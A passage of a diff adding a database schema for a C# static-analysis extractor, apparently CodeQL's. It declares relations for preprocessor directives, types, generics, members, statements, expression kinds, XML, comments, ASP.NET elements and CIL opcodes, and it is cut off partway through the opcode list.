+ int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref); /* 0: false, 1: true */ + +directive_elifs( + unique int id: @directive_elif, + int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +directive_elses( + unique int id: @directive_else, + int branchTaken: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +#keyset[id, start] +directive_endifs( + unique int id: @directive_endif, + unique int start: @directive_if ref); + +directive_define_symbols( + unique int id: @define_symbol_expr ref, + string name: string ref); + +directive_regions( + unique int id: @directive_region, + string name: string ref); + +#keyset[id, start] +directive_endregions( + unique int id: @directive_endregion, + unique int start: @directive_region ref); + +directive_lines( + unique int id: @directive_line, + int kind: int ref); /* 0: default, 1: hidden, 2: numeric, 3: span */ + +directive_line_value( + unique int id: @directive_line ref, + int line: int ref); + +directive_line_file( + unique int id: @directive_line ref, + int file: @file ref); + +directive_line_offset( + unique int id: @directive_line ref, + int offset: int ref); + +directive_line_span( + unique int id: @directive_line ref, + int startLine: int ref, + int startColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +directive_nullables( + unique int id: @directive_nullable, + int setting: int ref, /* 0: disable, 1: enable, 2: restore */ + int target: int ref); /* 0: none, 1: annotations, 2: warnings */ + +directive_warnings( + unique int id: @directive_warning, + string message: string ref); + +directive_errors( + unique int id: @directive_error, + string message: string ref); + +directive_undefines( + unique int id: @directive_undefine, + string name: string ref); + +directive_defines( + unique int id: @directive_define, + string name: string ref); + +pragma_checksums( + unique int id: @pragma_checksum, + int file: @file ref, + string guid: string ref, + string bytes: string ref); + +pragma_warnings( + unique int id: @pragma_warning, + int kind: int ref /* 0 = disable, 1 = restore */); + +#keyset[id, index] +pragma_warning_error_codes( + int id: @pragma_warning ref, + string errorCode: string ref, + int index: int ref); + +preprocessor_directive_location( + unique int id: @preprocessor_directive ref, + int loc: @location ref); + +preprocessor_directive_compilation( + unique int id: @preprocessor_directive ref, + int compilation: @compilation ref); + +preprocessor_directive_active( + unique int id: @preprocessor_directive ref, + int active: int ref); /* 0: false, 1: true */ + +/** TYPES **/ + +types( + unique int id: @type, + int kind: int ref, + string name: string ref); + +case @type.kind of + 1 = @bool_type +| 2 = @char_type +| 3 = @decimal_type +| 4 = @sbyte_type +| 5 = @short_type +| 6 = @int_type +| 7 = @long_type +| 8 = @byte_type +| 9 = @ushort_type +| 10 = @uint_type +| 11 = @ulong_type +| 12 = @float_type +| 13 = @double_type +| 14 = @enum_type +| 15 = @struct_type +| 17 = @class_type +| 19 = @interface_type +| 20 = @delegate_type +| 21 = @null_type +| 22 = @type_parameter +| 23 = @pointer_type +| 24 = @nullable_type +| 25 = @array_type +| 26 = @void_type +| 27 = @int_ptr_type +| 28 = @uint_ptr_type +| 29 = @dynamic_type +| 30 = @arglist_type +| 31 = @unknown_type +| 32 = @tuple_type +| 33 = @function_pointer_type + ; + +@simple_type = @bool_type | @char_type | @integral_type | @floating_point_type | @decimal_type; +@integral_type = @signed_integral_type | @unsigned_integral_type; +@signed_integral_type = @sbyte_type | @short_type | @int_type | @long_type; +@unsigned_integral_type = @byte_type | @ushort_type | @uint_type | @ulong_type; +@floating_point_type = @float_type | @double_type; +@value_type = @simple_type | @enum_type | @struct_type | @nullable_type | @int_ptr_type + | @uint_ptr_type | @tuple_type; +@ref_type = @class_type | @interface_type | @array_type | @delegate_type | @null_type + | @dynamic_type; +@value_or_ref_type = @value_type | @ref_type; + +typerefs( + unique int id: @typeref, + string name: string ref); + +typeref_type( + int id: @typeref ref, + unique int typeId: @type ref); + +@type_or_ref = @type | @typeref; + +array_element_type( + unique int array: @array_type ref, + int dimension: int ref, + int rank: int ref, + int element: @type_or_ref ref); + +nullable_underlying_type( + unique int nullable: @nullable_type ref, + int underlying: @type_or_ref ref); + +pointer_referent_type( + unique int pointer: @pointer_type ref, + int referent: @type_or_ref ref); + +enum_underlying_type( + unique int enum_id: @enum_type ref, + int underlying_type_id: @type_or_ref ref); + +delegate_return_type( + unique int delegate_id: @delegate_type ref, + int return_type_id: @type_or_ref ref); + +function_pointer_return_type( + unique int function_pointer_id: @function_pointer_type ref, + int return_type_id: @type_or_ref ref); + +extend( + int sub: @type ref, + int super: @type_or_ref ref); + +anonymous_types( + unique int id: @type ref); + +@interface_or_ref = @interface_type | @typeref; + +implement( + int sub: @type ref, + int super: @type_or_ref ref); + +type_location( + int id: @type ref, + int loc: @location ref); + +tuple_underlying_type( + unique int tuple: @tuple_type ref, + int struct: @type_or_ref ref); + +#keyset[tuple, index] +tuple_element( + int tuple: @tuple_type ref, + int index: int ref, + unique int field: @field ref); + +attributes( + unique int id: @attribute, + int kind: int ref, + int type_id: @type_or_ref ref, + int target: @attributable ref); + +case @attribute.kind of + 0 = @attribute_default +| 1 = @attribute_return +| 2 = @attribute_assembly +| 3 = @attribute_module +; + +attribute_location( + int id: @attribute ref, + int loc: @location ref); + +@type_mention_parent = @element | @type_mention; + +type_mention( + unique int id: @type_mention, + int type_id: @type_or_ref ref, + int parent: @type_mention_parent ref); + +type_mention_location( + unique int id: @type_mention ref, + int loc: @location ref); + +@has_type_annotation = @assignable | @type_parameter | @callable | @expr | @delegate_type | @generic | @function_pointer_type; + +/** + * A direct annotation on an entity, for example `string? x;`. + * + * Annotations: + * 2 = reftype is not annotated "!" + * 3 = reftype is annotated "?" + * 4 = readonly ref type / in parameter + * 5 = ref type parameter, return or local variable + * 6 = out parameter + * + * Note that the annotation depends on the element it annotates. + * @assignable: The annotation is on the type of the assignable, for example the variable type. + * @type_parameter: The annotation is on the reftype constraint + * @callable: The annotation is on the return type + * @array_type: The annotation is on the element type + */ +type_annotation(int id: @has_type_annotation ref, int annotation: int ref); + +nullability(unique int nullability: @nullability, int kind: int ref); + +case @nullability.kind of + 0 = @oblivious +| 1 = @not_annotated +| 2 = @annotated +; + +#keyset[parent, index] +nullability_parent(int nullability: @nullability ref, int index: int ref, int parent: @nullability ref) + +type_nullability(int id: @has_type_annotation ref, int nullability: @nullability ref); + +/** + * The nullable flow state of an expression, as determined by Roslyn. + * 0 = none (default, not populated) + * 1 = not null + * 2 = maybe null + */ +expr_flowstate(unique int id: @expr ref, int state: int ref); + +/** GENERICS **/ + +@generic = @type | @method | @local_function; + +type_parameters( + unique int id: @type_parameter ref, + int index: int ref, + int generic_id: @generic ref, + int variance: int ref /* none = 0, out = 1, in = 2 */); + +#keyset[constructed_id, index] +type_arguments( + int id: @type_or_ref ref, + int index: int ref, + int constructed_id: @generic_or_ref ref); + +@generic_or_ref = @generic | @typeref; + +constructed_generic( + unique int constructed: @generic ref, + int generic: @generic_or_ref ref); + +type_parameter_constraints( + unique int id: @type_parameter_constraints, + int param_id: @type_parameter ref); + +type_parameter_constraints_location( + int id: @type_parameter_constraints ref, + int loc: @location ref); + +general_type_parameter_constraints( + int id: @type_parameter_constraints ref, + int kind: int ref /* class = 1, struct = 2, new = 3 */); + +specific_type_parameter_constraints( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref); + +specific_type_parameter_nullability( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref, + int nullability: @nullability ref); + +/** FUNCTION POINTERS */ + +function_pointer_calling_conventions( + int id: @function_pointer_type ref, + int kind: int ref); + +#keyset[id, index] +has_unmanaged_calling_conventions( + int id: @function_pointer_type ref, + int index: int ref, + int conv_id: @type_or_ref ref); + +/** MODIFIERS */ + +@modifiable = @modifiable_direct | @event_accessor; + +@modifiable_direct = @member | @accessor | @local_function | @anonymous_function_expr; + +modifiers( + unique int id: @modifier, + string name: string ref); + +has_modifiers( + int id: @modifiable_direct ref, + int mod_id: @modifier ref); + +compiler_generated(unique int id: @modifiable ref); + +/** MEMBERS **/ + +@member = @method | @constructor | @destructor | @field | @property | @event | @operator | @indexer | @type; + +@named_exprorstmt = @goto_stmt | @labeled_stmt | @expr; + +@virtualizable = @method | @property | @indexer | @event; + +exprorstmt_name( + unique int parent_id: @named_exprorstmt ref, + string name: string ref); + +nested_types( + unique int id: @type ref, + int declaring_type_id: @type ref, + int unbound_id: @type ref); + +properties( + unique int id: @property, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @property ref); + +property_location( + int id: @property ref, + int loc: @location ref); + +indexers( + unique int id: @indexer, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @indexer ref); + +indexer_location( + int id: @indexer ref, + int loc: @location ref); + +accessors( + unique int id: @accessor, + int kind: int ref, + string name: string ref, + int declaring_member_id: @member ref, + int unbound_id: @accessor ref); + +case @accessor.kind of + 1 = @getter +| 2 = @setter + ; + +init_only_accessors( + unique int id: @accessor ref); + +accessor_location( + int id: @accessor ref, + int loc: @location ref); + +events( + unique int id: @event, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @event ref); + +event_location( + int id: @event ref, + int loc: @location ref); + +event_accessors( + unique int id: @event_accessor, + int kind: int ref, + string name: string ref, + int declaring_event_id: @event ref, + int unbound_id: @event_accessor ref); + +case @event_accessor.kind of + 1 = @add_event_accessor +| 2 = @remove_event_accessor + ; + +event_accessor_location( + int id: @event_accessor ref, + int loc: @location ref); + +operators( + unique int id: @operator, + string name: string ref, + string symbol: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @operator ref); + +operator_location( + int id: @operator ref, + int loc: @location ref); + +constant_value( + int id: @variable ref, + string value: string ref); + +/** CALLABLES **/ + +@callable = @method | @constructor | @destructor | @operator | @callable_accessor | @anonymous_function_expr | @local_function; + +@callable_accessor = @accessor | @event_accessor; + +methods( + unique int id: @method, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @method ref); + +method_location( + int id: @method ref, + int loc: @location ref); + +constructors( + unique int id: @constructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @constructor ref); + +constructor_location( + int id: @constructor ref, + int loc: @location ref); + +destructors( + unique int id: @destructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @destructor ref); + +destructor_location( + int id: @destructor ref, + int loc: @location ref); + +overrides( + int id: @callable ref, + int base_id: @callable ref); + +explicitly_implements( + int id: @member ref, + int interface_id: @interface_or_ref ref); + +local_functions( + unique int id: @local_function, + string name: string ref, + int return_type: @type ref, + int unbound_id: @local_function ref); + +local_function_stmts( + unique int fn: @local_function_stmt ref, + int stmt: @local_function ref); + +/** VARIABLES **/ + +@variable = @local_scope_variable | @field; + +@local_scope_variable = @local_variable | @parameter; + +fields( + unique int id: @field, + int kind: int ref, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @field ref); + +case @field.kind of + 1 = @addressable_field +| 2 = @constant + ; + +field_location( + int id: @field ref, + int loc: @location ref); + +localvars( + unique int id: @local_variable, + int kind: int ref, + string name: string ref, + int implicitly_typed: int ref /* 0 = no, 1 = yes */, + int type_id: @type_or_ref ref, + int parent_id: @local_var_decl_expr ref); + +case @local_variable.kind of + 1 = @addressable_local_variable +| 2 = @local_constant +| 3 = @local_variable_ref + ; + +localvar_location( + unique int id: @local_variable ref, + int loc: @location ref); + +@parameterizable = @callable | @delegate_type | @indexer | @function_pointer_type; + +#keyset[name, parent_id] +#keyset[index, parent_id] +params( + unique int id: @parameter, + string name: string ref, + int type_id: @type_or_ref ref, + int index: int ref, + int mode: int ref, /* value = 0, ref = 1, out = 2, array = 3, this = 4 */ + int parent_id: @parameterizable ref, + int unbound_id: @parameter ref); + +param_location( + int id: @parameter ref, + int loc: @location ref); + +/** STATEMENTS **/ + +@exprorstmt_parent = @control_flow_element | @top_level_exprorstmt_parent; + +statements( + unique int id: @stmt, + int kind: int ref); + +#keyset[index, parent] +stmt_parent( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_stmt_parent = @callable; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +stmt_parent_top_level( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @top_level_stmt_parent ref); + +case @stmt.kind of + 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @switch_stmt +| 5 = @while_stmt +| 6 = @do_stmt +| 7 = @for_stmt +| 8 = @foreach_stmt +| 9 = @break_stmt +| 10 = @continue_stmt +| 11 = @goto_stmt +| 12 = @goto_case_stmt +| 13 = @goto_default_stmt +| 14 = @throw_stmt +| 15 = @return_stmt +| 16 = @yield_stmt +| 17 = @try_stmt +| 18 = @checked_stmt +| 19 = @unchecked_stmt +| 20 = @lock_stmt +| 21 = @using_block_stmt +| 22 = @var_decl_stmt +| 23 = @const_decl_stmt +| 24 = @empty_stmt +| 25 = @unsafe_stmt +| 26 = @fixed_stmt +| 27 = @label_stmt +| 28 = @catch +| 29 = @case_stmt +| 30 = @local_function_stmt +| 31 = @using_decl_stmt + ; + +@using_stmt = @using_block_stmt | @using_decl_stmt; + +@labeled_stmt = @label_stmt | @case; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @using_decl_stmt; + +@cond_stmt = @if_stmt | @switch_stmt; + +@loop_stmt = @while_stmt | @do_stmt | @for_stmt | @foreach_stmt; + +@jump_stmt = @break_stmt | @goto_any_stmt | @continue_stmt | @throw_stmt | @return_stmt + | @yield_stmt; + +@goto_any_stmt = @goto_default_stmt | @goto_case_stmt | @goto_stmt; + + +stmt_location( + unique int id: @stmt ref, + int loc: @location ref); + +catch_type( + unique int catch_id: @catch ref, + int type_id: @type_or_ref ref, + int kind: int ref /* explicit = 1, implicit = 2 */); + +foreach_stmt_info( + unique int id: @foreach_stmt ref, + int kind: int ref /* non-async = 1, async = 2 */); + +@foreach_symbol = @method | @property | @type_or_ref; + +#keyset[id, kind] +foreach_stmt_desugar( + int id: @foreach_stmt ref, + int symbol: @foreach_symbol ref, + int kind: int ref /* GetEnumeratorMethod = 1, CurrentProperty = 2, MoveNextMethod = 3, DisposeMethod = 4, ElementType = 5 */); + +/** EXPRESSIONS **/ + +expressions( + unique int id: @expr, + int kind: int ref, + int type_id: @type_or_ref ref); + +#keyset[index, parent] +expr_parent( + unique int expr: @expr ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_expr_parent = @attribute | @field | @property | @indexer | @parameter | @directive_if | @directive_elif; + +@top_level_exprorstmt_parent = @top_level_expr_parent | @top_level_stmt_parent; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +expr_parent_top_level( + unique int expr: @expr ref, + int index: int ref, + int parent: @top_level_exprorstmt_parent ref); + +case @expr.kind of +/* literal */ + 1 = @bool_literal_expr +| 2 = @char_literal_expr +| 3 = @decimal_literal_expr +| 4 = @int_literal_expr +| 5 = @long_literal_expr +| 6 = @uint_literal_expr +| 7 = @ulong_literal_expr +| 8 = @float_literal_expr +| 9 = @double_literal_expr +| 10 = @string_literal_expr +| 11 = @null_literal_expr +/* primary & unary */ +| 12 = @this_access_expr +| 13 = @base_access_expr +| 14 = @local_variable_access_expr +| 15 = @parameter_access_expr +| 16 = @field_access_expr +| 17 = @property_access_expr +| 18 = @method_access_expr +| 19 = @event_access_expr +| 20 = @indexer_access_expr +| 21 = @array_access_expr +| 22 = @type_access_expr +| 23 = @typeof_expr +| 24 = @method_invocation_expr +| 25 = @delegate_invocation_expr +| 26 = @operator_invocation_expr +| 27 = @cast_expr +| 28 = @object_creation_expr +| 29 = @explicit_delegate_creation_expr +| 30 = @implicit_delegate_creation_expr +| 31 = @array_creation_expr +| 32 = @default_expr +| 33 = @plus_expr +| 34 = @minus_expr +| 35 = @bit_not_expr +| 36 = @log_not_expr +| 37 = @post_incr_expr +| 38 = @post_decr_expr +| 39 = @pre_incr_expr +| 40 = @pre_decr_expr +/* multiplicative */ +| 41 = @mul_expr +| 42 = @div_expr +| 43 = @rem_expr +/* additive */ +| 44 = @add_expr +| 45 = @sub_expr +/* shift */ +| 46 = @lshift_expr +| 47 = @rshift_expr +/* relational */ +| 48 = @lt_expr +| 49 = @gt_expr +| 50 = @le_expr +| 51 = @ge_expr +/* equality */ +| 52 = @eq_expr +| 53 = @ne_expr +/* logical */ +| 54 = @bit_and_expr +| 55 = @bit_xor_expr +| 56 = @bit_or_expr +| 57 = @log_and_expr +| 58 = @log_or_expr +/* type testing */ +| 59 = @is_expr +| 60 = @as_expr +/* null coalescing */ +| 61 = @null_coalescing_expr +/* conditional */ +| 62 = @conditional_expr +/* assignment */ +| 63 = @simple_assign_expr +| 64 = @assign_add_expr +| 65 = @assign_sub_expr +| 66 = @assign_mul_expr +| 67 = @assign_div_expr +| 68 = @assign_rem_expr +| 69 = @assign_and_expr +| 70 = @assign_xor_expr +| 71 = @assign_or_expr +| 72 = @assign_lshift_expr +| 73 = @assign_rshift_expr +/* more */ +| 74 = @object_init_expr +| 75 = @collection_init_expr +| 76 = @array_init_expr +| 77 = @checked_expr +| 78 = @unchecked_expr +| 79 = @constructor_init_expr +| 80 = @add_event_expr +| 81 = @remove_event_expr +| 82 = @par_expr +| 83 = @local_var_decl_expr +| 84 = @lambda_expr +| 85 = @anonymous_method_expr +| 86 = @namespace_expr +/* dynamic */ +| 92 = @dynamic_element_access_expr +| 93 = @dynamic_member_access_expr +/* unsafe */ +| 100 = @pointer_indirection_expr +| 101 = @address_of_expr +| 102 = @sizeof_expr +/* async */ +| 103 = @await_expr +/* C# 6.0 */ +| 104 = @nameof_expr +| 105 = @interpolated_string_expr +| 106 = @unknown_expr +/* C# 7.0 */ +| 107 = @throw_expr +| 108 = @tuple_expr +| 109 = @local_function_invocation_expr +| 110 = @ref_expr +| 111 = @discard_expr +/* C# 8.0 */ +| 112 = @range_expr +| 113 = @index_expr +| 114 = @switch_expr +| 115 = @recursive_pattern_expr +| 116 = @property_pattern_expr +| 117 = @positional_pattern_expr +| 118 = @switch_case_expr +| 119 = @assign_coalesce_expr +| 120 = @suppress_nullable_warning_expr +| 121 = @namespace_access_expr +/* C# 9.0 */ +| 122 = @lt_pattern_expr +| 123 = @gt_pattern_expr +| 124 = @le_pattern_expr +| 125 = @ge_pattern_expr +| 126 = @not_pattern_expr +| 127 = @and_pattern_expr +| 128 = @or_pattern_expr +| 129 = @function_pointer_invocation_expr +| 130 = @with_expr +/* C# 11.0 */ +| 131 = @list_pattern_expr +| 132 = @slice_pattern_expr +/* Preprocessor */ +| 999 = @define_symbol_expr +; + +@switch = @switch_stmt | @switch_expr; +@case = @case_stmt | @switch_case_expr; +@pattern_match = @case | @is_expr; +@unary_pattern_expr = @not_pattern_expr; +@relational_pattern_expr = @gt_pattern_expr | @lt_pattern_expr | @ge_pattern_expr | @le_pattern_expr; +@binary_pattern_expr = @and_pattern_expr | @or_pattern_expr; + +@integer_literal_expr = @int_literal_expr | @long_literal_expr | @uint_literal_expr | @ulong_literal_expr; +@real_literal_expr = @float_literal_expr | @double_literal_expr | @decimal_literal_expr; +@literal_expr = @bool_literal_expr | @char_literal_expr | @integer_literal_expr | @real_literal_expr + | @string_literal_expr | @null_literal_expr; + +@assign_expr = @simple_assign_expr | @assign_op_expr | @local_var_decl_expr; +@assign_op_expr = @assign_arith_expr | @assign_bitwise_expr | @assign_event_expr | @assign_coalesce_expr; +@assign_event_expr = @add_event_expr | @remove_event_expr; + +@assign_arith_expr = @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr + | @assign_rem_expr +@assign_bitwise_expr = @assign_and_expr | @assign_or_expr | @assign_xor_expr + | @assign_lshift_expr | @assign_rshift_expr; + +@member_access_expr = @field_access_expr | @property_access_expr | @indexer_access_expr | @event_access_expr + | @method_access_expr | @type_access_expr | @dynamic_member_access_expr; +@access_expr = @member_access_expr | @this_access_expr | @base_access_expr | @assignable_access_expr | @namespace_access_expr; +@element_access_expr = @indexer_access_expr | @array_access_expr | @dynamic_element_access_expr; + +@local_variable_access = @local_variable_access_expr | @local_var_decl_expr; +@local_scope_variable_access_expr = @parameter_access_expr | @local_variable_access; +@variable_access_expr = @local_scope_variable_access_expr | @field_access_expr; + +@assignable_access_expr = @variable_access_expr | @property_access_expr | @element_access_expr + | @event_access_expr | @dynamic_member_access_expr; + +@objectorcollection_init_expr = @object_init_expr | @collection_init_expr; + +@delegate_creation_expr = @explicit_delegate_creation_expr | @implicit_delegate_creation_expr; + +@bin_arith_op_expr = @mul_expr | @div_expr | @rem_expr | @add_expr | @sub_expr; +@incr_op_expr = @pre_incr_expr | @post_incr_expr; +@decr_op_expr = @pre_decr_expr | @post_decr_expr; +@mut_op_expr = @incr_op_expr | @decr_op_expr; +@un_arith_op_expr = @plus_expr | @minus_expr | @mut_op_expr; +@arith_op_expr = @bin_arith_op_expr | @un_arith_op_expr; + +@ternary_log_op_expr = @conditional_expr; +@bin_log_op_expr = @log_and_expr | @log_or_expr | @null_coalescing_expr; +@un_log_op_expr = @log_not_expr; +@log_expr = @un_log_op_expr | @bin_log_op_expr | @ternary_log_op_expr; + +@bin_bit_op_expr = @bit_and_expr | @bit_or_expr | @bit_xor_expr | @lshift_expr + | @rshift_expr; +@un_bit_op_expr = @bit_not_expr; +@bit_expr = @un_bit_op_expr | @bin_bit_op_expr; + +@equality_op_expr = @eq_expr | @ne_expr; +@rel_op_expr = @gt_expr | @lt_expr| @ge_expr | @le_expr; +@comp_expr = @equality_op_expr | @rel_op_expr; + +@op_expr = @assign_expr | @un_op | @bin_op | @ternary_op; + +@ternary_op = @ternary_log_op_expr; +@bin_op = @bin_arith_op_expr | @bin_log_op_expr | @bin_bit_op_expr | @comp_expr; +@un_op = @un_arith_op_expr | @un_log_op_expr | @un_bit_op_expr | @sizeof_expr + | @pointer_indirection_expr | @address_of_expr; + +@anonymous_function_expr = @lambda_expr | @anonymous_method_expr; + +@call = @method_invocation_expr | @constructor_init_expr | @operator_invocation_expr + | @delegate_invocation_expr | @object_creation_expr | @call_access_expr + | @local_function_invocation_expr | @function_pointer_invocation_expr; + +@call_access_expr = @property_access_expr | @event_access_expr | @indexer_access_expr; + +@late_bindable_expr = @dynamic_element_access_expr | @dynamic_member_access_expr + | @object_creation_expr | @method_invocation_expr | @operator_invocation_expr; + +@throw_element = @throw_expr | @throw_stmt; + +@implicitly_typeable_object_creation_expr = @object_creation_expr | @explicit_delegate_creation_expr; + +implicitly_typed_array_creation( + unique int id: @array_creation_expr ref); + +explicitly_sized_array_creation( + unique int id: @array_creation_expr ref); + +stackalloc_array_creation( + unique int id: @array_creation_expr ref); + +implicitly_typed_object_creation( + unique int id: @implicitly_typeable_object_creation_expr ref); + +mutator_invocation_mode( + unique int id: @operator_invocation_expr ref, + int mode: int ref /* prefix = 1, postfix = 2*/); + +expr_compiler_generated( + unique int id: @expr ref); + +expr_value( + unique int id: @expr ref, + string value: string ref); + +expr_call( + unique int caller_id: @expr ref, + int target_id: @callable ref); + +expr_access( + unique int accesser_id: @access_expr ref, + int target_id: @accessible ref); + +@accessible = @method | @assignable | @local_function | @namespace; + +expr_location( + unique int id: @expr ref, + int loc: @location ref); + +dynamic_member_name( + unique int id: @late_bindable_expr ref, + string name: string ref); + +@qualifiable_expr = @member_access_expr + | @method_invocation_expr + | @element_access_expr; + +conditional_access( + unique int id: @qualifiable_expr ref); + +expr_argument( + unique int id: @expr ref, + int mode: int ref); + /* mode is the same as params: value = 0, ref = 1, out = 2 */ + +expr_argument_name( + unique int id: @expr ref, + string name: string ref); + +lambda_expr_return_type( + unique int id: @lambda_expr ref, + int type_id: @type_or_ref ref); + +/** CONTROL/DATA FLOW **/ + +@control_flow_element = @stmt | @expr; + +/* XML Files */ + +xmlEncoding ( + unique int id: @file ref, + string encoding: string ref); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/* Comments */ + +commentline( + unique int id: @commentline, + int kind: int ref, + string text: string ref, + string rawtext: string ref); + +case @commentline.kind of + 0 = @singlelinecomment +| 1 = @xmldoccomment +| 2 = @multilinecomment; + +commentline_location( + unique int id: @commentline ref, + int loc: @location ref); + +commentblock( + unique int id : @commentblock); + +commentblock_location( + unique int id: @commentblock ref, + int loc: @location ref); + +commentblock_binding( + int id: @commentblock ref, + int entity: @element ref, + int bindtype: int ref); /* 0: Parent, 1: Best, 2: Before, 3: After */ + +commentblock_child( + int id: @commentblock ref, + int commentline: @commentline ref, + int index: int ref); + +/* ASP.NET */ + +case @asp_element.kind of + 0=@asp_close_tag +| 1=@asp_code +| 2=@asp_comment +| 3=@asp_data_binding +| 4=@asp_directive +| 5=@asp_open_tag +| 6=@asp_quoted_string +| 7=@asp_text +| 8=@asp_xml_directive; + +@asp_attribute = @asp_code | @asp_data_binding | @asp_quoted_string; + +asp_elements( + unique int id: @asp_element, + int kind: int ref, + int loc: @location ref); + +asp_comment_server(unique int comment: @asp_comment ref); +asp_code_inline(unique int code: @asp_code ref); +asp_directive_attribute( + int directive: @asp_directive ref, + int index: int ref, + string name: string ref, + int value: @asp_quoted_string ref); +asp_directive_name( + unique int directive: @asp_directive ref, + string name: string ref); +asp_element_body( + unique int element: @asp_element ref, + string body: string ref); +asp_tag_attribute( + int tag: @asp_open_tag ref, + int index: int ref, + string name: string ref, + int attribute: @asp_attribute ref); +asp_tag_name( + unique int tag: @asp_open_tag ref, + string name: string ref); +asp_tag_isempty(int tag: @asp_open_tag ref); + +/* Common Intermediate Language - CIL */ + +case @cil_instruction.opcode of + 0 = @cil_nop +| 1 = @cil_break +| 2 = @cil_ldarg_0 +| 3 = @cil_ldarg_1 +| 4 = @cil_ldarg_2 +| 5 = @cil_ldarg_3 +| 6 = @cil_ldloc_0 +| 7 = @cil_ldloc_1 +| 8 = @cil_ldloc_2 +| 9 = @cil_ldloc_3 +| 10 = @cil_stloc_0 +| 11 = @cil_stloc_1 +| 12 = @cil_stloc_2 +| 13 = @cil_stloc_3 +| 14 = @cil_ldarg_s +| 15 = @cil_ldarga_s +| 16 = @cil_starg_s +| 17 = @cil_ldloc_s +| 18 = @cil_ldloca_s +| 19 = @cil_stloc_s +| 20 = @cil_ldnull +| 21 = @cil_ldc_i4_m1 +| 22 = @cil_ldc_i4_0 +| 23 = @cil_ldc_i4_1 +| 24 = @cil_ldc_i4_2 +| 25 = @cil_ldc_i4_3 +| 26 = @cil_ldc_i4_4 +| 27 = @cil_ldc_i4_5 +| 28 = @cil_ldc_i4_6 +| 29 = @cil_ldc_i4_7 +| 30 = @cil_ldc_i4_8 +| 31 = @cil_ldc_i4_s +| 32 = @cil_ldc_i4 +| 33 = @cil_ldc_i8 +| 34 = @cil_ldc_r4 +| 35 = @cil_ldc_r8 +| 37 = @cil_dup +| 38 = @cil_pop +| 39 = @cil_jmp +| 40 = @cil_call +| 41 = @cil_calli +| 42 = @cil_ret +| 43 = @cil_br_s +| 44 = @cil_brfalse_s +| 45 = @cil_brtrue_s +| 46 = @cil_beq_s +| 47 = @cil_bge_s +| 48 = @cil_bgt_s +| 49 = @cil_ble_s +| 50 = @cil_blt_s +| 51 = @cil_bne_un_s +| 52 = @cil_bge_un_s +| 53 = @cil_bgt_un_s +| 54 = @cil_ble_un_s +| 55 = @cil_blt_un_s +| 56 = @cil_br +| 57 = @cil_brfalse +| 58 = @cil_brtrue +| 59 = @cil_beq +| 60 = @cil_bge +| 61 = @cil_bgt +| 62 = @cil_ble +| 63 = @cil_blt +| 64 = @cil_bne_un +| 65 = @cil_bge_un +| 66 = @cil_bgt_un +| 67 = @cil_ble_un +| 68 = @cil_blt_un +| 69 = @cil_switch +| 70 = @cil_ldind_i1 +| 71 = @cil_ldind_u1 +| 72 = @cil_ldind_i2 +| 73 = @cil_ldind_u2 +| 74 = @cil_ldind_i4 +| 75 = @cil_ldind_u4 +| 76 = @cil_ldind_i8 +| 77 = @cil_ldind_i +| 78 = @cil_ldind_r4 +| 79 = @cil_ldind_r8 +| 80 = @cil_ldind_ref +| 81 = @cil_stind_ref +| 82 = @cil_stind_i1 +| 83 = @cil_stind_i2 +| 84 = @cil_stind_i4 +| 85 = @cil_stind_i8 +| 86 = @cil_stind_r4 +| 87 = @cil_stind_r8 +| 88 = @cil_add +| 89 = @cil_sub +| 90 = @cil_mul +| 91 = @cil_div +| 92 = @cil_div_un +| 93 = @cil_rem +| 94 = @cil_rem_un +| 95 = @cil_and +| 96 = @cil_or +| 97 = @cil_xor +| 98 = @cil_shl +| 99 = @cil_shr +| 100 = @cil_shr_un +| 101 = @cil_neg +| 102 = @cil_not +| 103 = @cil_conv_i1 +| 104 = @cil_conv_i2 +| 105 = @cil_conv_i4 +| 106 = @cil_conv_i8 +| 107 = @cil_conv_r4 +| 108 = @cil_conv_r8 +| 109 = @cil_conv_u4 +| 110 = 